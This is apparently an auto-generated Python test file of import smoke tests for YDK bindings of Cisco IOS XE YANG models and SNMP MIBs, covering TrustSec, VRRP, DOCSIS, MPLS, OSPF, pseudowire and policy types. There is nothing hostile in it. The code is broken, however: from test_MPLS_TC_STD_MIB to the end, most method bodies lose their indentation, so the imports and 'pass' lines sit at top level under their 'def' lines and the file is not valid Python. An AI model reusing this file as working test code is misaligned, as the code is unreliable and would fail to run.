def test_Cisco_IOS_XE_trustsec_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_trustsec_oper import CtsOdmBindingSource
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_trustsec_oper import SxpConState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_trustsec_oper import SxpConMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_trustsec_oper import TrustsecState
def test_Cisco_IOS_XE_tunnel(self):
    pass
def test_Cisco_IOS_XE_types(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import AccessListInOutType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import AclUdpPortType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import AclTcpPortType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import RedistOspfExternalType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import CosValueType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import DscpType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import ExpValueType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import InterfaceType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import MobilityType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import PrecValueType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import PrecedenceType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import LimitDcNonDcType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import QosValueType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import WeekdayType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import BgpIpv4AfType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import BgpIpv6AfType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import CommunityWellKnownType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import CommunityWellKnownAddType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_types import MonthType
# NOTE(review): auto-generated import smoke tests — remaining Cisco-IOS-XE
# modules followed by SNMP MIB bindings (DIAL/DIFFSERV/DISMAN/DOCS/DS/ENTITY/
# ETHER/EXPRESSION/FRAME-RELAY families).
def test_Cisco_IOS_XE_udld(self):
    pass
def test_Cisco_IOS_XE_umbrella(self):
    pass
def test_Cisco_IOS_XE_utd(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_utd import UtdCategoryType
def test_Cisco_IOS_XE_utd_common_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_utd_common_oper import UtdUpdateStatusVal
def test_Cisco_IOS_XE_utd_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_utd_oper import UtdOperStatusVal
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_utd_oper import UtdOperData
def test_Cisco_IOS_XE_virtual_service_cfg(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_virtual_service_cfg import VirtualServiceCfgData
def test_Cisco_IOS_XE_virtual_service_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_virtual_service_oper import VirtualServices
def test_Cisco_IOS_XE_vlan(self):
    pass
def test_Cisco_IOS_XE_vlan_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vlan_oper import VlanStatusType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vlan_oper import Vlans
def test_Cisco_IOS_XE_voice(self):
    pass
def test_Cisco_IOS_XE_vpdn(self):
    pass
def test_Cisco_IOS_XE_vrrp(self):
    pass
def test_Cisco_IOS_XE_vrrp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import ProtoVersion
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import MasterReason
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import VrrpProtoState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import OmpStateUpdown
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import TrackState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_vrrp_oper import VrrpOperData
def test_Cisco_IOS_XE_vservice(self):
    pass
def test_Cisco_IOS_XE_vstack(self):
    pass
def test_Cisco_IOS_XE_vtp(self):
    pass
def test_Cisco_IOS_XE_wccp(self):
    pass
def test_Cisco_IOS_XE_wsma(self):
    pass
def test_Cisco_IOS_XE_zone(self):
    pass
def test_DIAL_CONTROL_MIB(self):
    from ydk.models.cisco_ios_xe.DIAL_CONTROL_MIB import DIALCONTROLMIB
def test_DIFFSERV_DSCP_TC(self):
    pass
def test_DIFFSERV_MIB(self):
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamSimpleTokenBucket
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamAvgRate
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamSrTCMBlind
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamSrTCMAware
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamTrTCMBlind
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamTrTCMAware
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServTBParamTswTCM
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServSchedulerPriority
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServSchedulerWRR
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DiffServSchedulerWFQ
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import IfDirection
    from ydk.models.cisco_ios_xe.DIFFSERV_MIB import DIFFSERVMIB
def test_DISMAN_EVENT_MIB(self):
    from ydk.models.cisco_ios_xe.DISMAN_EVENT_MIB import FailureReason
    from ydk.models.cisco_ios_xe.DISMAN_EVENT_MIB import DISMANEVENTMIB
def test_DISMAN_EXPRESSION_MIB(self):
    from ydk.models.cisco_ios_xe.DISMAN_EXPRESSION_MIB import DISMANEXPRESSIONMIB
def test_DOCS_CABLE_DEVICE_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_CABLE_DEVICE_MIB import DOCSCABLEDEVICEMIB
def test_DOCS_IETF_BPI2_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_IETF_BPI2_MIB import DocsBpkmSAType
    from ydk.models.cisco_ios_xe.DOCS_IETF_BPI2_MIB import DocsBpkmDataEncryptAlg
    from ydk.models.cisco_ios_xe.DOCS_IETF_BPI2_MIB import DocsBpkmDataAuthentAlg
    from ydk.models.cisco_ios_xe.DOCS_IETF_BPI2_MIB import DOCSIETFBPI2MIB
def test_DOCS_IF3_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import CmRegState
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import CmtsCmRegState
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import SpectrumAnalysisWindowFunction
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import RangingState
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import IfDirection
    from ydk.models.cisco_ios_xe.DOCS_IF3_MIB import DOCSIF3MIB
def test_DOCS_IF_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_IF_MIB import DocsisVersion
    from ydk.models.cisco_ios_xe.DOCS_IF_MIB import DocsisQosVersion
    from ydk.models.cisco_ios_xe.DOCS_IF_MIB import DocsisUpstreamType
    from ydk.models.cisco_ios_xe.DOCS_IF_MIB import DocsisUpstreamTypeStatus
    from ydk.models.cisco_ios_xe.DOCS_IF_MIB import DOCSIFMIB
def test_DOCS_L2VPN_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_L2VPN_MIB import DocsNsiEncapSubtype
    from ydk.models.cisco_ios_xe.DOCS_L2VPN_MIB import DOCSL2VPNMIB
def test_DOCS_QOS_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_QOS_MIB import IfDirection
    from ydk.models.cisco_ios_xe.DOCS_QOS_MIB import SchedulingType
    from ydk.models.cisco_ios_xe.DOCS_QOS_MIB import DOCSQOSMIB
def test_DOCS_SUBMGT3_MIB(self):
    from ydk.models.cisco_ios_xe.DOCS_SUBMGT3_MIB import DOCSSUBMGT3MIB
def test_DRAFT_MSDP_MIB(self):
    from ydk.models.cisco_ios_xe.DRAFT_MSDP_MIB import DRAFTMSDPMIB
def test_DS1_MIB(self):
    from ydk.models.cisco_ios_xe.DS1_MIB import DS1MIB
def test_DS3_MIB(self):
    from ydk.models.cisco_ios_xe.DS3_MIB import DS3MIB
def test_ENTITY_MIB(self):
    from ydk.models.cisco_ios_xe.ENTITY_MIB import PhysicalClass
    from ydk.models.cisco_ios_xe.ENTITY_MIB import ENTITYMIB
def test_ENTITY_SENSOR_MIB(self):
    from ydk.models.cisco_ios_xe.ENTITY_SENSOR_MIB import EntitySensorDataType
    from ydk.models.cisco_ios_xe.ENTITY_SENSOR_MIB import EntitySensorDataScale
    from ydk.models.cisco_ios_xe.ENTITY_SENSOR_MIB import EntitySensorStatus
    from ydk.models.cisco_ios_xe.ENTITY_SENSOR_MIB import ENTITYSENSORMIB
def test_ENTITY_STATE_MIB(self):
    from ydk.models.cisco_ios_xe.ENTITY_STATE_MIB import ENTITYSTATEMIB
def test_ENTITY_STATE_TC_MIB(self):
    from ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB import EntityAdminState
    from ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB import EntityOperState
    from ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB import EntityUsageState
    from ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB import EntityStandbyStatus
def test_ETHER_WIS(self):
    from ydk.models.cisco_ios_xe.ETHER_WIS import ETHERWIS
def test_EXPRESSION_MIB(self):
    from ydk.models.cisco_ios_xe.EXPRESSION_MIB import EXPRESSIONMIB
def test_EtherLike_MIB(self):
    from ydk.models.cisco_ios_xe.EtherLike_MIB import Dot3TestTdr
    from ydk.models.cisco_ios_xe.EtherLike_MIB import Dot3TestLoopBack
    from ydk.models.cisco_ios_xe.EtherLike_MIB import Dot3ErrorInitError
    from ydk.models.cisco_ios_xe.EtherLike_MIB import Dot3ErrorLoopbackError
    from ydk.models.cisco_ios_xe.EtherLike_MIB import EtherLikeMIB
def test_FRAME_RELAY_DTE_MIB(self):
    from ydk.models.cisco_ios_xe.FRAME_RELAY_DTE_MIB import FRAMERELAYDTEMIB
def test_HCNUM_TC(self):
    pass
# NOTE(review): auto-generated import smoke tests — IANA/IEEE/IETF standard MIB
# bindings (IANA*, IEEE8021, IF/IGMP/INET/IP*, LLDP, MPLS families).
def test_IANA_ADDRESS_FAMILY_NUMBERS_MIB(self):
    from ydk.models.cisco_ios_xe.IANA_ADDRESS_FAMILY_NUMBERS_MIB import AddressFamilyNumbers
def test_IANA_RTPROTO_MIB(self):
    from ydk.models.cisco_ios_xe.IANA_RTPROTO_MIB import IANAipRouteProtocol
    from ydk.models.cisco_ios_xe.IANA_RTPROTO_MIB import IANAipMRouteProtocol
def test_IANAifType_MIB(self):
    from ydk.models.cisco_ios_xe.IANAifType_MIB import IANAifType
    from ydk.models.cisco_ios_xe.IANAifType_MIB import IANAtunnelType
def test_IEEE8021_TC_MIB(self):
    from ydk.models.cisco_ios_xe.IEEE8021_TC_MIB import IEEE8021PriorityCodePoint
    from ydk.models.cisco_ios_xe.IEEE8021_TC_MIB import IEEE8021BridgePortType
    from ydk.models.cisco_ios_xe.IEEE8021_TC_MIB import IEEE8021ServiceSelectorType
    from ydk.models.cisco_ios_xe.IEEE8021_TC_MIB import IEEE8021PortAcceptableFrameTypes
def test_IF_MIB(self):
    from ydk.models.cisco_ios_xe.IF_MIB import IFMIB
def test_IGMP_STD_MIB(self):
    from ydk.models.cisco_ios_xe.IGMP_STD_MIB import IGMPSTDMIB
def test_INET_ADDRESS_MIB(self):
    from ydk.models.cisco_ios_xe.INET_ADDRESS_MIB import InetAddressType
    from ydk.models.cisco_ios_xe.INET_ADDRESS_MIB import InetScopeType
    from ydk.models.cisco_ios_xe.INET_ADDRESS_MIB import InetVersion
def test_INTEGRATED_SERVICES_MIB(self):
    from ydk.models.cisco_ios_xe.INTEGRATED_SERVICES_MIB import QosService
    from ydk.models.cisco_ios_xe.INTEGRATED_SERVICES_MIB import INTEGRATEDSERVICESMIB
def test_INT_SERV_MIB(self):
    from ydk.models.cisco_ios_xe.INT_SERV_MIB import QosService
    from ydk.models.cisco_ios_xe.INT_SERV_MIB import INTSERVMIB
def test_IPMROUTE_STD_MIB(self):
    from ydk.models.cisco_ios_xe.IPMROUTE_STD_MIB import IPMROUTESTDMIB
def test_IPV6_FLOW_LABEL_MIB(self):
    pass
def test_IP_FORWARD_MIB(self):
    from ydk.models.cisco_ios_xe.IP_FORWARD_MIB import IPFORWARDMIB
def test_IP_MIB(self):
    from ydk.models.cisco_ios_xe.IP_MIB import IpAddressOriginTC
    from ydk.models.cisco_ios_xe.IP_MIB import IpAddressStatusTC
    from ydk.models.cisco_ios_xe.IP_MIB import IpAddressPrefixOriginTC
    from ydk.models.cisco_ios_xe.IP_MIB import IPMIB
def test_LLDP_MIB(self):
    from ydk.models.cisco_ios_xe.LLDP_MIB import LldpChassisIdSubtype
    from ydk.models.cisco_ios_xe.LLDP_MIB import LldpPortIdSubtype
    from ydk.models.cisco_ios_xe.LLDP_MIB import LldpManAddrIfSubtype
    from ydk.models.cisco_ios_xe.LLDP_MIB import LLDPMIB
def test_MPLS_L3VPN_STD_MIB(self):
    from ydk.models.cisco_ios_xe.MPLS_L3VPN_STD_MIB import MplsL3VpnRtType
    from ydk.models.cisco_ios_xe.MPLS_L3VPN_STD_MIB import MPLSL3VPNSTDMIB
def test_MPLS_LDP_GENERIC_STD_MIB(self):
    from ydk.models.cisco_ios_xe.MPLS_LDP_GENERIC_STD_MIB import MPLSLDPGENERICSTDMIB
def test_MPLS_LDP_STD_MIB(self):
    from ydk.models.cisco_ios_xe.MPLS_LDP_STD_MIB import MPLSLDPSTDMIB
def test_MPLS_LSR_STD_MIB(self):
    from ydk.models.cisco_ios_xe.MPLS_LSR_STD_MIB import MPLSLSRSTDMIB
def test_MPLS_TC_MIB(self):
    from ydk.models.cisco_ios_xe.MPLS_TC_MIB import MplsInitialCreationSource
    from ydk.models.cisco_ios_xe.MPLS_TC_MIB import MplsLdpLabelTypes
def test_MPLS_TC_STD_MIB(self):
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import MplsLabelDistributionMethod
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import MplsLdpLabelType
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import MplsLspType
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import MplsOwner
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import MplsRetentionMode
from ydk.models.cisco_ios_xe.MPLS_TC_STD_MIB import TeHopAddressType
def test_MPLS_TE_STD_MIB(self):
from ydk.models.cisco_ios_xe.MPLS_TE_STD_MIB import MPLSTESTDMIB
def test_MPLS_VPN_MIB(self):
from ydk.models.cisco_ios_xe.MPLS_VPN_MIB import MPLSVPNMIB
def test_NHRP_MIB(self):
from ydk.models.cisco_ios_xe.NHRP_MIB import NHRPMIB
def test_NOTIFICATION_LOG_MIB(self):
from ydk.models.cisco_ios_xe.NOTIFICATION_LOG_MIB import NOTIFICATIONLOGMIB
def test_OLD_CISCO_INTERFACES_MIB(self):
from ydk.models.cisco_ios_xe.OLD_CISCO_INTERFACES_MIB import OLDCISCOINTERFACESMIB
def test_OSPF_MIB(self):
from ydk.models.cisco_ios_xe.OSPF_MIB import Status
from ydk.models.cisco_ios_xe.OSPF_MIB import OspfAuthenticationType
from ydk.models.cisco_ios_xe.OSPF_MIB import OSPFMIB
def test_OSPF_TRAP_MIB(self):
from ydk.models.cisco_ios_xe.OSPF_TRAP_MIB import OSPFTRAPMIB
def test_PIM_MIB(self):
from ydk.models.cisco_ios_xe.PIM_MIB import PIMMIB
def test_POWER_ETHERNET_MIB(self):
from ydk.models.cisco_ios_xe.POWER_ETHERNET_MIB import POWERETHERNETMIB
def test_P_BRIDGE_MIB(self):
from ydk.models.cisco_ios_xe.P_BRIDGE_MIB import EnabledStatus
from ydk.models.cisco_ios_xe.P_BRIDGE_MIB import PBRIDGEMIB
def test_PerfHist_TC_MIB(self):
pass
def test_Q_BRIDGE_MIB(self):
from ydk.models.cisco_ios_xe.Q_BRIDGE_MIB import QBRIDGEMIB
def test_RFC1155_SMI(self):
pass
def test_RFC1213_MIB(self):
from ydk.models.cisco_ios_xe.RFC1213_MIB import RFC1213MIB
def test_RFC1315_MIB(self):
from ydk.models.cisco_ios_xe.RFC1315_MIB import RFC1315MIB
def test_RFC_1212(self):
pass
def test_RFC_1215(self):
pass
def test_RMON2_MIB(self):
from ydk.models.cisco_ios_xe.RMON2_MIB import RMON2MIB
def test_RMON_MIB(self):
from ydk.models.cisco_ios_xe.RMON_MIB import RmonEventsV2
from ydk.models.cisco_ios_xe.RMON_MIB import EntryStatus
from ydk.models.cisco_ios_xe.RMON_MIB import RMONMIB
def test_RSVP_MIB(self):
from ydk.models.cisco_ios_xe.RSVP_MIB import RsvpEncapsulation
from ydk.models.cisco_ios_xe.RSVP_MIB import RSVPMIB
def test_SNMP_FRAMEWORK_MIB(self):
from ydk.models.cisco_ios_xe.SNMP_FRAMEWORK_MIB import SnmpAuthProtocols
from ydk.models.cisco_ios_xe.SNMP_FRAMEWORK_MIB import SnmpPrivProtocols
from ydk.models.cisco_ios_xe.SNMP_FRAMEWORK_MIB import SnmpSecurityLevel
from ydk.models.cisco_ios_xe.SNMP_FRAMEWORK_MIB import SNMPFRAMEWORKMIB
def test_SNMP_PROXY_MIB(self):
from ydk.models.cisco_ios_xe.SNMP_PROXY_MIB import SNMPPROXYMIB
def test_SNMP_TARGET_MIB(self):
from ydk.models.cisco_ios_xe.SNMP_TARGET_MIB import SNMPTARGETMIB
def test_SNMPv2_MIB(self):
from ydk.models.cisco_ios_xe.SNMPv2_MIB import SNMPv2MIB
def test_SNMPv2_TC(self):
from ydk.models.cisco_ios_xe.SNMPv2_TC import TruthValue
from ydk.models.cisco_ios_xe.SNMPv2_TC import RowStatus
from ydk.models.cisco_ios_xe.SNMPv2_TC import StorageType
def test_SONET_MIB(self):
from ydk.models.cisco_ios_xe.SONET_MIB import SONETMIB
def test_TCP_MIB(self):
from ydk.models.cisco_ios_xe.TCP_MIB import TCPMIB
def test_TOKENRING_MIB(self):
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5TestInsertFunc
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5TestFullDuplexLoopBack
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetIBM16
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetTItms380
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetTItms380c16
from ydk.models.cisco_ios_xe.TOKENRING_MIB import TOKENRINGMIB
def test_TOKEN_RING_RMON_MIB(self):
from ydk.models.cisco_ios_xe.TOKEN_RING_RMON_MIB import EntryStatus
from ydk.models.cisco_ios_xe.TOKEN_RING_RMON_MIB import TOKENRINGRMONMIB
def test_TUNNEL_MIB(self):
from ydk.models.cisco_ios_xe.TUNNEL_MIB import TUNNELMIB
def test_UDP_MIB(self):
from ydk.models.cisco_ios_xe.UDP_MIB import UDPMIB
def test_VPN_TC_STD_MIB(self):
pass
def test_cisco_bridge_common(self):
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacLimitNotificationType
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifNone
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSnmpTrap
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSyslog
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSyslogAndSnmpTrap
from ydk.models.cisco_ios_xe.cisco_bridge_common import EthTrafficClass
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacAgingType
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacLimitAction
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacSecureAction
def test_cisco_bridge_domain(self):
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainStateType
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainConfig
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainState
from ydk.models.cisco_ios_xe.cisco_bridge_domain import ClearBridgeDomain
from ydk.models.cisco_ios_xe.cisco_bridge_domain import ClearMacAddress
from ydk.models.cisco_ios_xe.cisco_bridge_domain import CreateParameterizedBridgeDomains
def test_cisco_ethernet(self):
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed10mb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed100mb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed1gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed10gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed40gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed100gb
def test_cisco_ia(self):
from ydk.models.cisco_ios_xe.cisco_ia import ParserMsgProcessingMethod
from ydk.models.cisco_ios_xe.cisco_ia import CiaSyncType
from ydk.models.cisco_ios_xe.cisco_ia import CiaLogLevel
from ydk.models.cisco_ios_xe.cisco_ia import OnepLogLevel
from ydk.models.cisco_ios_xe.cisco_ia import SyslogSeverity
from ydk.models.cisco_ios_xe.cisco_ia import SyncFrom
from ydk.models.cisco_ios_xe.cisco_ia import SaveConfig
from ydk.models.cisco_ios_xe.cisco_ia import IsSyncing
from ydk.models.cisco_ios_xe.cisco_ia import Checkpoint
from ydk.models.cisco_ios_xe.cisco_ia import Revert
from ydk.models.cisco_ios_xe.cisco_ia import Rollback
def test_cisco_ospf(self):
from ydk.models.cisco_ios_xe.cisco_ospf import OspfExternalType
from ydk.models.cisco_ios_xe.cisco_ospf import AccessListInOutType
from ydk.models.cisco_ios_xe.cisco_ospf import PrefixApplicability
from ydk.models.cisco_ios_xe.cisco_ospf import OspfLogAdj
def test_cisco_policy(self):
pass
def test_cisco_policy_filters(self):
pass
def test_cisco_policy_target(self):
pass
def test_cisco_pw(self):
from ydk.models.cisco_ios_xe.cisco_pw import PwEncapsulationType
from ydk.models.cisco_ios_xe.cisco_pw import PwEncapMpls
from ydk.models.cisco_ios_xe.cisco_pw import PwVcType
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeEther
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeVlan
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeVlanPassthrough
from ydk.models.cisco_ios_xe.cisco_pw import PwLoadBalanceType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthernetType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthSrcMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthDstMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthSrcDstMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpSrcIp
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpDstIp
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpSrcDstIp
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolType
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolNone
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolLdp
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolBgp
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingType
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingReceive
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingTransmit
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingBoth
from ydk.models.cisco_ios_xe.cisco_pw import PwOperStateType
from ydk.models.cisco_ios_xe.cisco_pw import PseudowireConfig
from ydk.models.cisco_ios_xe.cisco_pw import PseudowireState
def test_cisco_routing_ext(self):
from ydk.models.cisco_ios_xe.cisco_routing_ext import Rip
from ydk.models.cisco_ios_xe.cisco_routing_ext import IsIs
from ydk.models.cisco_ios_xe.cisco_routing_ext import Bgp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Eigrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Igrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Nhrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Hsrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Lisp
def test_cisco_self_mgmt(self):
from ydk.models.cisco_ios_xe.cisco_self_mgmt import NetconfYang
def test_cisco_smart_license(self):
from ydk.models.cisco_ios_xe.cisco_smart_license import NotifRegisterFailureEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import RegistrationStateEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import AuthorizationStateEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import UtilityReportingTypeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import TransportTypeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import EnforcementModeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import ErrorEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import RegisterIdToken
from ydk.models.cisco_ios_xe.cisco_smart_license import DeRegister
from ydk.models.cisco_ios_xe.cisco_smart_license import RenewId
from ydk.models.cisco_ios_xe.cisco_smart_license import RenewAuth
from ydk.models.cisco_ios_xe.cisco_smart_license import Licensing
def test_cisco_smart_license_errors(self):
pass
def test_cisco_storm_control(self):
from ydk.models.cisco_ios_xe.cisco_storm_control import StormControlAction
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionDrop
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionSnmpTrap
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionShutdown
def test_common_mpls_static(self):
from ydk.models.cisco_ios_xe.common_mpls_static import LspType
from ydk.models.cisco_ios_xe.common_mpls_static import LspIPv4
from ydk.models.cisco_ios_xe.common_mpls_static import LspIPv6
from ydk.models.cisco_ios_xe.common_mpls_static import LspVrf
from ydk.models.cisco_ios_xe.common_mpls_static import Lsp
from ydk.models.cisco_ios_xe.common_mpls_static import NexthopResolutionType
from ydk.models.cisco_ios_xe.common_mpls_static import StaticNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import BgpRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import OspfRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import IsisRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import Hoptype
from ydk.models.cisco_ios_xe.common_mpls_static import MplsStatic
def test_common_mpls_types(self):
from ydk.models.cisco_ios_xe.common_mpls_types import IetfMplsLabel
def test_nvo(self):
from ydk.models.cisco_ios_xe.nvo import OverlayEncapType
from ydk.models.cisco_ios_xe.nvo import VxlanType
from ydk.models.cisco_ios_xe.nvo import NvgreType
from ydk.models.cisco_ios_xe.nvo import NvoInstances
def test_pim(self):
from ydk.models.cisco_ios_xe.pim import GroupToRpMappingMode
from ydk.models.cisco_ios_xe.pim import DmMappingMode
from ydk.models.cisco_ios_xe.pim import SmMappingMode
from ydk.models.cisco_ios_xe.pim import PimBidirMappingMode
from ydk.models.cisco_ios_xe.pim import SsmMappingMode
from ydk.models.cisco_ios_xe.pim import AsmMappingMode
from ydk.models.cisco_ios_xe.pim import OtherMappingMode
from ydk.models.cisco_ios_xe.pim import RouteProtocolType
from ydk.models.cisco_ios_xe.pim import MrouteProtocolType
from ydk.models.cisco_ios_xe.pim import PimMode
from ydk.models.cisco_ios_xe.pim import Origin
def test_policy_attr(self):
pass
def test_policy_types(self):
    """Smoke-test that every public name in ietf.policy_types is importable.

    NOTE(review): this method was previously defined twice back-to-back
    with identical bodies; the second definition silently shadowed the
    first (flake8 F811 redefinition).  The duplicate has been removed —
    unittest still discovers and runs ``test_policy_types`` exactly once,
    so observable behaviour is unchanged.
    """
    from ydk.models.ietf.policy_types import PolicyType
    from ydk.models.ietf.policy_types import Qos
    from ydk.models.ietf.policy_types import Pbr
    from ydk.models.ietf.policy_types import PerfMon
    from ydk.models.ietf.policy_types import AccessControl
    from ydk.models.ietf.policy_types import Appnav
    from ydk.models.ietf.policy_types import Control
    from ydk.models.ietf.policy_types import Inspect
    from ydk.models.ietf.policy_types import PacketService
    from ydk.models.ietf.policy_types import Service
    from ydk.models.ietf.policy_types import ClassType
    from ydk.models.ietf.policy_types import QosClass
    from ydk.models.ietf.policy_types import AccessControlClass
    from ydk.models.ietf.policy_types import AppnavClass
    from ydk.models.ietf.policy_types import ControlClass
    from ydk.models.ietf.policy_types import InspectClass
    from ydk.models.ietf.policy_types import Cos
    from ydk.models.ietf.policy_types import CosInner
    from ydk.models.ietf.policy_types import Ipv4AclName
    from ydk.models.ietf.policy_types import Ipv6AclName
    from ydk.models.ietf.policy_types import Ipv4Acl
    from ydk.models.ietf.policy_types import Ipv6Acl
    from ydk.models.ietf.policy_types import InputInterface
    from ydk.models.ietf.policy_types import SrcMac
    from ydk.models.ietf.policy_types import DstMac
    from ydk.models.ietf.policy_types import MplsExpTop
    from ydk.models.ietf.policy_types import MplsExpImp
    from ydk.models.ietf.policy_types import PacketLength
    from ydk.models.ietf.policy_types import Prec
    from ydk.models.ietf.policy_types import QosGroup
    from ydk.models.ietf.policy_types import Vlan
    from ydk.models.ietf.policy_types import VlanInner
